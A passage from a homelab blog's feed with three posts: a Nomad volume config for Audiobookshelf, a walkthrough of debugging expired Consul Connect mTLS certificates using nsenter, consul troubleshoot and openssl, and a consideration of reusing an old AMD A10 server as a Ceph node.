<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#75715e"># 0000-5555-fake-id
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>plugin_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ceph-csi-rbd&#34;</span>
</span></span><span style="display:flex;"><span>capacity_max <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;100G&#34;</span>
</span></span><span style="display:flex;"><span>capacity_min <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;100G&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">capability</span> {
</span></span><span style="display:flex;"><span>  access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>  attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">mount_options</span> {
</span></span><span style="display:flex;"><span>  fs_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ext4&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">secrets</span> {
</span></span><span style="display:flex;"><span>  userID  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mine-id&#34;</span>
</span></span><span style="display:flex;"><span>  userKey <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;really not that interesting&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">context</span> {
</span></span><span style="display:flex;"><span>  clusterID <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;useless-string-of-numbers-and-letters&#34;</span>
</span></span><span style="display:flex;"><span>  pool <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;homenet-base-bulk&#34;</span>
</span></span><span style="display:flex;"><span>  imageFeatures <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;layering,exclusive-lock,fast-diff,object-map&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I definitely need to finish my &ldquo;Homelab setup&rdquo; series and finally get to the
Nomad and Consul parts, so I have something to link here to explain all the
boilerplate.</p>
<p>The only notable thing here is the <code>memory_max</code> config, which grants the
container up to 4 GB of memory. This <code>memory_max</code> value is the hard limit where the Linux OOM killer
gets active, while <code>memory</code> is what Nomad bases its scheduling on. Under normal
operation, ABS runs fine with 400 MB, although it does take as much memory as
it can get. But when uploading an audiobook, the memory consumption jumps very
high, and I&rsquo;m not sure why. During ingestion of e.g. Ken Follett&rsquo;s
<em>Winter of the World</em>, a 31h, 865 MB tome, the consumption jumps straight to
2.5 GB - and seems to stay there. I have not run into any problems with 4 GB
yet.</p>
<p>No idea what ABS is doing there, really - they can&rsquo;t just blindly load the
file into memory, right? And even if they did, the book is only 865 MB.</p>
<p>That&rsquo;s it for today. I think I like this format of not only describing my app
setup, but also giving a little review.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Consul Connect certificate problems</title>
      <link>https://blog.mei-home.net/posts/consul-mesh-problem/</link>
      <pubDate>Sun, 02 Apr 2023 17:13:30 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/consul-mesh-problem/</guid>
      <description>When the cluster goes down every 72 hours...</description>
      <content:encoded><![CDATA[<p>I updated my Nomad and Consul clusters recently. Especially Consul was a
large jump, getting from 1.13.5 to 1.15.1. After about three days, I suddenly
started getting <code>500: Internal server error</code> from a lot of my services.
In this article, I will be going into the debugging process and explain a little
bit about what Consul Connect is and how it works.</p>
<h2 id="why-consul-connect">Why Consul Connect?</h2>
<p>So <a href="https://developer.hashicorp.com/consul/docs/connect">Consul Connect</a>, or
<em>Consul Service Mesh</em>, creates a sort-of overlay network to connect services
running on multiple machines, in a secure manner.</p>
<figure>
    <img loading="lazy" src="mesh-overview.svg"
         alt="A diagram of a Consul connect service. A cloud sits at the top of the diagram, titled &#39;The Network&#39;. In a large box titled &#39;Machine A&#39;, several smaller boxes are shown. An elongated box at the bottom reads &#39;Network namespace of service FOO&#39;. Connected to it is a shape labeled &#39;FOO Container&#39;, which does not have any connection to &#39;The Network&#39;, but only to the network namespace box. Besides it is an Envoy Proxy logo. It is connected to the local network namespace, and to &#39;The Network&#39;, noting that it forwards incoming connections to the socket of the FOO service in the local network namespace. Another Envoy proxy is shown next to it, also connected to &#39;The Network&#39; and the local namespaces, denoted as listening for connections to BAR."/> 
</figure>

<p>It works like this: Every service (in my case Nomad jobs, but it also
works standalone) gets a sidecar running <a href="https://www.envoyproxy.io/">Envoy proxy</a>.
Each service also gets its own network namespace, which is the only network the service
container is connected to.</p>
<p>There are multiple Envoy proxy sidecars. One of them is always present in
a Mesh enabled service: The Envoy proxy allowing connections from the outside.
But this proxy does not just allow any connection. Instead, it is protected with
mTLS certificates. Those certificates are handed out by the Consul cluster.
Without a fitting mTLS certificate, an incoming connection will be rejected.</p>
<p>Whether a TLS cert is actually valid, and a connection is allowed to a service&rsquo;s
proxy, is defined by Consul intentions. Those allow or deny connections between
services, based on service names.</p>
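<p>For illustration, intentions can be managed with the <code>consul intention</code> subcommands
(or via the web UI). A minimal sketch, with <code>frontend</code> and <code>backend</code> as
hypothetical service names:</p>
<pre tabindex="0"><code># Allow connections from frontend to backend (hypothetical service names)
consul intention create -allow frontend backend

# Ask Consul what it would decide for this source/destination pair
consul intention check frontend backend
</code></pre>
<p>Depending on your default policy, a wildcard deny intention between <code>*</code> and <code>*</code>
can then make sure that only explicitly allowed pairs get through.</p>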
<p>So let&rsquo;s say we have a service FOO, which wants to connect to service BAR. In
this case, in Nomad, an <em>upstream</em> would be defined. This upstream will mean
that Consul will configure the local Envoy proxy for the service with the IP and
port of the Envoy proxy fronting the BAR service. In addition, the local port
that BAR should be reachable on needs to be defined.</p>
<p>Then, the Envoy proxy will open a socket on the given port in the local service
network namespace and wait for connections. Once a connection is made, the data
is encrypted with mTLS certificates and forwarded to BAR&rsquo;s Envoy. There, it is
decrypted and then forwarded to the local port on which BAR is listening in
its local network namespace.</p>
<p>This shows the three advantages of using Consul Connect service mesh:</p>
<ol>
<li>Connections are automatically encrypted - without having to configure TLS
certs for every service.</li>
<li>Consul&rsquo;s service discovery is used, so no hardcoded IPs or ports are needed.</li>
<li>You don&rsquo;t just have your service&rsquo;s ports dangling openly in your LAN.
Only connections from services permitted by the configured Consul intentions
get through, as the connection is not made to the service directly, but to its
Envoy proxy.</li>
</ol>
<p>And the complexity of setting this up is not too high, at least after the
initial setup. For example, my service config in the Nomad job file for Nextcloud
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-HCL" data-lang="HCL"><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;nextcloud&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">proxy</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">6379</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.nextcloud.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">foobar</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.nextcloud.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">my</span>.<span style="color:#66d9ef">very</span>.<span style="color:#66d9ef">own</span>.<span style="color:#66d9ef">cloud</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span></code></pre></div><p>Nextcloud has two upstream dependencies: Redis for caching and Postgres for the
database. Redis is bound to its default port and Postgres to 5577, but only in the job group&rsquo;s
own network namespace. So Nextcloud is simply configured to connect to Redis under
<code>localhost:6379</code> and to Postgres under <code>localhost:5577</code>. The Envoy proxy then
takes care of forwarding any connections to the Envoy proxies of these two
services.</p>
<p>Another very nice thing is that Traefik already supports Consul Connect natively.
So it doesn&rsquo;t even need an Envoy proxy. It automatically discovers all
services in the mesh, checks whether they have the <code>traefik.enable=true</code> tag
and then uses the other <code>traefik.*</code> tags to automatically set up routes.</p>
<p>But it&rsquo;s not all milk and honey. As you can see, some acrobatics are needed for
health checks to work. That&rsquo;s because, with a config like this, the only way
into the service from the outside is via the Envoy proxy - and that
only allows connections with the right mTLS client cert. But the local Consul
agent needs to be able to connect to the service somehow, to make sure it works.
I do this by mapping the service&rsquo;s port to a port on a local host network and running the
health check on that, which works reasonably well.</p>
<p>In addition, Envoy is mostly intended for Layer 7 proxying. As you can see in
the example above, it does work with plain TCP as well - but it fails with TLS. So
if I were to enable TLS connections in Postgres and Redis, it wouldn&rsquo;t work anymore.</p>
<p>There is a somewhat similar problem with Traefik. It currently has a bug where
it does not use the right certificates to talk to backend services via the mesh,
if the incoming connection is pure TLS, instead of HTTPS.</p>
<h2 id="the-bug">The bug</h2>
<p>Now finally onto what the main part of this post was supposed to be about&hellip;</p>
<p>As mentioned above, communication in the Consul Connect mesh relies on mTLS, both
for encryption and for authorization. Those mTLS certs have a TTL of 72h by default,
after which Consul is supposed to automatically renew them.</p>
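<p>As an aside, you can peek at the leaf certificate Consul has issued for a service
via the local agent&rsquo;s API. A small sketch, assuming an agent on <code>127.0.0.1:8500</code>
without ACL tokens and <code>jq</code> installed; <code>nextcloud</code> is just one of my services
used as an example:</p>
<pre tabindex="0"><code># Print the validity window of the current leaf cert for the service
curl -s http://127.0.0.1:8500/v1/agent/connect/ca/leaf/nextcloud \
  | jq -r &#39;.ValidAfter, .ValidBefore&#39;
</code></pre>
<p>In theory, the <code>ValidBefore</code> timestamp should keep moving into the future as Consul
rotates the certificate well before the 72h are up.</p>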
<p>But it doesn&rsquo;t, in Consul v1.15.1.</p>
<p>At first, I had no idea what was going on - I was suddenly getting HTTP error code
500 almost everywhere. The health
checks were almost all green, and there were no errors in the logs anywhere. I later realized
that this was partially because my health checks bypass the mesh
and run on a local port, as shown above.</p>
<p>When it happened a second time, I realized that it was exactly 72 hours after
I had last restarted all of my services. So I opened <a href="https://github.com/hashicorp/consul/issues/16779">this GitHub issue</a>, and the debugging started.</p>
<p>First, I used Consul&rsquo;s own troubleshooting functionality, with the aptly named
<a href="https://developer.hashicorp.com/consul/commands/troubleshoot">troubleshoot</a>
command.</p>
<p>This command, at least in the setup I have with separate network namespaces in
Nomad jobs, needed to be run in the service container&rsquo;s namespace. Linux has a
handy tool to execute host binaries in a namespace&rsquo;s context. This is the
<code>nsenter</code> command.</p>
<p>To use it, first list your docker containers with <code>docker ps</code> and note the
<em>Container ID</em> of the container you want to enter. Then, you need the PID of
said container, which you can get with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>docker inspect -f <span style="color:#e6db74">&#39;{{.State.Pid}}&#39;</span> &lt;CONTAINER_ID&gt;
</span></span></code></pre></div><p>Then, you can run the actual troubleshooting command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nsenter -t PID -n consul troubleshoot proxy -envoy-admin-endpoint<span style="color:#f92672">=</span>&lt;ENVOY_ADMIN_ADDR&gt; -upstream-ip<span style="color:#f92672">=</span>127.0.0.1
</span></span></code></pre></div><p>The <code>ENVOY_ADMIN_ADDR</code> is the IP and port of the Envoy proxy&rsquo;s admin endpoint
for the service.
You can see it for example by running <code>ss -tulnp</code> in the service&rsquo;s network
namespace:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nsenter -t <span style="color:#ae81ff">1182230</span> -n ss -tulnp
</span></span><span style="display:flex;"><span>Netid          State           Recv-Q           Send-Q                     Local Address:Port                      Peer Address:Port          Process                                                                                         
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.1:5577                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181034,fd<span style="color:#f92672">=</span>26<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.1:6379                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181034,fd<span style="color:#f92672">=</span>25<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">1024</span>                             0.0.0.0:3000                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;ruby&#34;</span>,pid<span style="color:#f92672">=</span>1182550,fd<span style="color:#f92672">=</span>5<span style="color:#f92672">)</span>,<span style="color:#f92672">(</span><span style="color:#e6db74">&#34;ruby&#34;</span>,pid<span style="color:#f92672">=</span>1182542,fd<span style="color:#f92672">=</span>5<span style="color:#f92672">)</span>,<span style="color:#f92672">(</span><span style="color:#e6db74">&#34;ruby&#34;</span>,pid<span style="color:#f92672">=</span>1182256,fd<span style="color:#f92672">=</span>5<span style="color:#f92672">))</span>          
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.2:19003                          0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181034,fd<span style="color:#f92672">=</span>14<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                           127.0.0.2:19004                          0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181041,fd<span style="color:#f92672">=</span>14<span style="color:#f92672">))</span>                                                            
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">511</span>                              0.0.0.0:4000                           0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;node&#34;</span>,pid<span style="color:#f92672">=</span>1182257,fd<span style="color:#f92672">=</span>21<span style="color:#f92672">))</span>                                                             
</span></span><span style="display:flex;"><span>tcp            LISTEN          <span style="color:#ae81ff">0</span>                <span style="color:#ae81ff">4096</span>                             0.0.0.0:20226                          0.0.0.0:*              users:<span style="color:#f92672">((</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181041,fd<span style="color:#f92672">=</span>33<span style="color:#f92672">)</span>,<span style="color:#f92672">(</span><span style="color:#e6db74">&#34;envoy&#34;</span>,pid<span style="color:#f92672">=</span>1181041,fd<span style="color:#f92672">=</span>24<span style="color:#f92672">))</span>                                
</span></span></code></pre></div><p>This output is an example from my Mastodon Sidekiq container. It shows multiple
envoy processes, e.g. the upstreams supplying Redis and Postgres connectivity.
The admin ports for the Envoy instances are the ports starting with <code>19xxx</code>.</p>
<p>So for inspecting the Envoy proxy running under <code>127.0.0.2:19003</code>, I would enter
the following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nsenter -t <span style="color:#ae81ff">1182230</span> -n consul troubleshoot proxy -envoy-admin-endpoint<span style="color:#f92672">=</span>127.0.0.2:19003 -upstream-ip<span style="color:#f92672">=</span>127.0.0.1
</span></span></code></pre></div><p>This will show certificate errors, like this one:</p>
<pre tabindex="0"><code>==&gt; Validation                                             
 ! Certificate chain is expired
  -&gt; Check the logs of the Consul agent configuring the local proxy and ensure XDS updates are being sent to the proxy
 ! Certificate chain is expired
  -&gt; Check the logs of the Consul agent configuring the local proxy and ensure XDS updates are being sent to the proxy
 ! Certificate chain is expired
  -&gt; Check the logs of the Consul agent configuring the local proxy and ensure XDS updates are being sent to the proxy
 ✓ Envoy has 0 rejected configurations
 ✓ Envoy has detected 1464 connection failure(s)
 ! No listener for upstream &#34;127.0.0.1&#34; 
  -&gt; Check that your upstream service is registered with Consul
  -&gt; Make sure your upstream exists by running the `consul[-k8s] troubleshoot upstreams` command
  -&gt; If you are using transparent proxy for this upstream, ensure you have set up allow intentions to the upstream
  -&gt; Check the logs of the Consul agent configuring the local proxy to ensure XDS resources were sent by Consul
 ! No clusters found on route or listener
</code></pre><p>Another interesting thing you can do is check the certs directly with OpenSSL.
For this, you need the address and port of a service&rsquo;s public Envoy listener, which
you can look up in Consul. Then you can run:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>openssl s_client -showcerts -connect &lt;ADDR&gt;
</span></span></code></pre></div><p>This will produce an output similar to this:</p>
<pre tabindex="0"><code>CONNECTED(00000003)
Can&#39;t use SSL_get_servername
depth=0 
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 
verify error:num=21:unable to verify the first certificate
verify return:1
depth=0 
verify return:1
---
Certificate chain
 0 s:
   i:CN = REDACTED.consul
   a:PKEY: id-ecPublicKey, 256 (bit); sigalg: RSA-SHA256
   v:NotBefore: Mar 31 19:56:43 2023 GMT; NotAfter: Apr  3 19:56:43 2023 GMT
-----BEGIN CERTIFICATE-----
REDACTED
-----END CERTIFICATE-----
---
Server certificate
subject=
issuer=CN = REDACTED.consul
---
Acceptable client certificate CA names
CN = REDACTED.consul
Requested Signature Algorithms: ECDSA+SHA256:RSA-PSS+SHA256:RSA+SHA256:ECDSA+SHA384:RSA-PSS+SHA384:RSA+SHA384:RSA-PSS+SHA512:RSA+SHA512:RSA+SHA1
Shared Requested Signature Algorithms: ECDSA+SHA256:RSA-PSS+SHA256:RSA+SHA256:ECDSA+SHA384:RSA-PSS+SHA384:RSA+SHA384:RSA-PSS+SHA512:RSA+SHA512
Peer signing digest: SHA256
Peer signature type: ECDSA
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1392 bytes and written 403 bytes
Verification error: unable to verify the first certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 256 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 21 (unable to verify the first certificate)
---
4097EA98687F0000:error:0A00045C:SSL routines:ssl3_read_bytes:tlsv13 alert certificate required:../ssl/record/rec_layer_s3.c:1584:SSL alert number 116
</code></pre><p>The interesting line is this one:</p>
<pre tabindex="0"><code>v:NotBefore: Mar 31 19:56:43 2023 GMT; NotAfter: Apr  3 19:56:43 2023 GMT
</code></pre><p>It shows the cert&rsquo;s expiration date.</p>
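<p>If you only care about the dates, you can also pipe the presented certificate
straight into <code>openssl x509</code>. A small sketch; the address and port are
placeholders for a service&rsquo;s public Envoy listener:</p>
<pre tabindex="0"><code># Grab the presented server cert and print only its validity dates
openssl s_client -connect 10.0.0.10:25923 &lt;/dev/null 2&gt;/dev/null \
  | openssl x509 -noout -dates
</code></pre>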
<p>After some investigation in the ticket, it turned out that it wasn&rsquo;t just me, but
that a recent change in local caching behavior had prevented automatic renewals
from being communicated to the Envoy proxies.</p>
<p>Which yet again proves: Caching is one of the two hard things in software
engineering. The other two being &ldquo;naming things&rdquo; and &ldquo;off by one errors&rdquo;.</p>
<p>Luckily, the issue seems to have been found, and a new version, 1.15.2, was
released on Friday.</p>
<p>I immediately did the update, and found something nice: This time around, I did
not stop all Nomad jobs in the cluster, but instead just updated the Consul version.
And it worked without issue. So I will be able to do future Consul agent updates
without full job restarts.</p>
<p>After the update, all services got new certificates. I&rsquo;m not sure whether that&rsquo;s
an indication that the update fixed the issue, or whether they just got the new
certs due to the Consul restart.</p>
<p>At the time of writing, the expiration date for the certs is tomorrow, April 3rd.</p>
<p>Let&rsquo;s see what happens.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Reduce, Reuse, Recycle: Reusing my old home server</title>
      <link>https://blog.mei-home.net/posts/reuse-old-homelab/</link>
      <pubDate>Wed, 29 Mar 2023 00:51:12 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/reuse-old-homelab/</guid>
      <description>Re-purposing older Hardware for a Ceph node in my Homelab</description>
      <content:encoded><![CDATA[<p>I had a random thought today, triggered, of all things, by a short training on
<em>Reduce, Reuse, Recycle</em> at work. This is the principle of first looking for
the potential to not produce anything new, then looking for a new use for something
old that has already been manufactured, and only then, as a final step, recycling
the thing.</p>
<p>I, and probably many other Homelabbers, have quite a bit of older hardware lying
around. Hardware that&rsquo;s still perfectly functional, but which is either too slow
or doesn&rsquo;t support newer features. For me, that&rsquo;s only two things, because
I was a poor student until relatively recently. &#x1f609; The first one, not
discussed here, is a desktop from 2017 which I replaced in 2019, built around an AMD
Ryzen 1700X. Still a powerful machine, but quite honestly a bit more powerful
and <strong>power hungry</strong> than my new <em>many small and less powerful machines</em> Homelab
principle calls for.</p>
<p>The second complete machine is my old homeserver, built in early 2018 and
replaced in early 2021. It has the following primary hardware:</p>
<ul>
<li><a href="https://www.amd.com/en/support/apu/amd-series-processors/amd-a10-series-apu-for-desktops/7th-gen-a10-9700e-apu">AMD A10-9700E</a>
This APU has four physical cores and four threads. It is that generations low
power desktop CPU, with a TDP of 35W.</li>
<li><a href="https://www.msi.com/Motherboard/A320M-PRO-VD-S/">MSI A320M PRO VD/S</a> I mostly
got this mainboard because it was cheap at the time. It boasts two RAM slots,
Dual Channel and four SATA ports and supports a maximum of 64GB of RAM (see below)</li>
<li>Corsair VS350: I would have loved to link to this power supply, but the Corsair
website told me I was blocked for security reasons&hellip;?</li>
</ul>
<p>Let&rsquo;s start with a short comment on the mainboard. It states that it supports
a max of 32 GB of RAM on the German website, but claims 64 GB max on the English
version. Weird.</p>
<p>The machine currently looks like this:</p>
<figure>
    <img loading="lazy" src="old-homeserver.jpg"
         alt="A picture of an open PC case. In it are two chambers. The lower one contains a power supply alongside a nest of cables. The model Corsair VS350 is noted on the side of the PSU. In the upper chamber is a brown mainboard, topped by a horizontal, low profile cooler in the proud brown and beige colors of Noctua."/> 
</figure>

<p>So how to reuse this somewhat older hardware? Both the mainboard and the CPU are
still alright. My use case for the system would be as a Ceph storage cluster
node. If you&rsquo;re interested in my storage setup, I&rsquo;ve written about Ceph and my
specific setup <a href="https://blog.mei-home.net/posts/homelab-2022/storage/">here</a>. My current
goal is splitting my Homelab into many smaller machines, mostly Raspberry Pis,
for the sake of having high availability. I&rsquo;ve currently already got one
<a href="https://www.hardkernel.com/shop/odroid-h3/">Odroid H3</a> serving as a Ceph node
with a single HDD and SSD. I like it, as it&rsquo;s pretty light on power consumption
with the very efficient <a href="https://www.intel.de/content/www/de/de/products/sku/212328/intel-celeron-processor-n5105-4m-cache-up-to-2-90-ghz/specifications.html">Intel Celeron N5105</a> at 10W TDP.
And I had already decided to get two more of those, to replace my current x86
main machine serving two Ceph VMs with one HDD and one SSD each, behind a 1Gbps
NIC.</p>
<p>On <a href="https://www.cpubenchmark.net/compare/4412vs3133/Intel-Celeron-N5105-vs-AMD-A10-9700E">CPUbenchmark.net</a>,
the H3&rsquo;s CPU is 25% faster and has a 25W lower TDP. It&rsquo;s also 6 years newer than
the AMD CPU. Also, the A10 uses the rather sad Excavator architecture.</p>
<p>For some measurements, I connected the machine to a smart power plug and booted
it off a USB stick. The results were pretty sobering.</p>
<ul>
<li>The A10-9700E eats 25W at idle, sitting at the command prompt of an Arch install
USB stick</li>
<li>When fully loaded with <code>stress --cpu 4</code>, it goes up to 50W</li>
</ul>
<p>On the bright side: The low profile <a href="https://noctua.at/en/nh-l9a-am4">Noctua NH-L9a-AM4</a>
can easily cool the A10 at about 45 degrees C even with <code>stress --cpu 4</code>.</p>
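<p>For reference, this kind of quick load-and-temperature check can be done with stock
tools. A rough sketch, assuming the <code>stress</code> and <code>lm_sensors</code> packages are installed:</p>
<pre tabindex="0"><code># Load all four cores in the background...
stress --cpu 4 &amp;

# ...then watch the CPU temperatures while the smart plug reports power draw
watch -n 2 sensors
</code></pre>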
<p>My only H3 is currently deployed as a Ceph node, so I can&rsquo;t easily plug it into
a separate power plug and measure it. But considering that it&rsquo;s six years younger
and an embedded class CPU, I expect it to come pretty close to the 10W TDP. The
Odroid website claims about 1W - 9W idle and up to 18W under load. Which is
still way lower than the 25W at which the A10 idled.</p>
<p>In addition, I would need a new PSU for the A10, as the current one just doesn&rsquo;t
sound very good anymore. It was cheap to begin with, and then ran non-stop for
about three years.</p>
<p>But there are advantages to reusing the A10 and only buying one additional H3.
First, it would save me about 100 bucks, even when taking the new PSU for the A10
into account.
Second, it has a proper PSU, with a lot of SATA power cables. And the mainboard
has four SATA ports, plus multiple PCIe Gen3 slots for more SATA cards. The RAM
can also be swapped out, and it supports up to 64GB. So in theory, I would be
able to connect a lot of disks to this thing - a lot more than the two that
can be connected to the H3 before you have to resort to a SATA port multiplier. And then
there would still be the problem of powering more than two SATA disks, as the
H3 only has two power connections and is itself supplied by a power brick, not
a proper PSU.</p>
<p>Finally, there&rsquo;s the environmental aspect. Instead of buying a new thing, almost
none of which is upgradeable at all, I could reuse old hardware that would go
into a landfill (well, some electronics recycling more likely) otherwise.</p>
<p>I must admit that, due to the power consumption of the A10, I&rsquo;m still undecided.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Current Homelab - Ceph Storage</title>
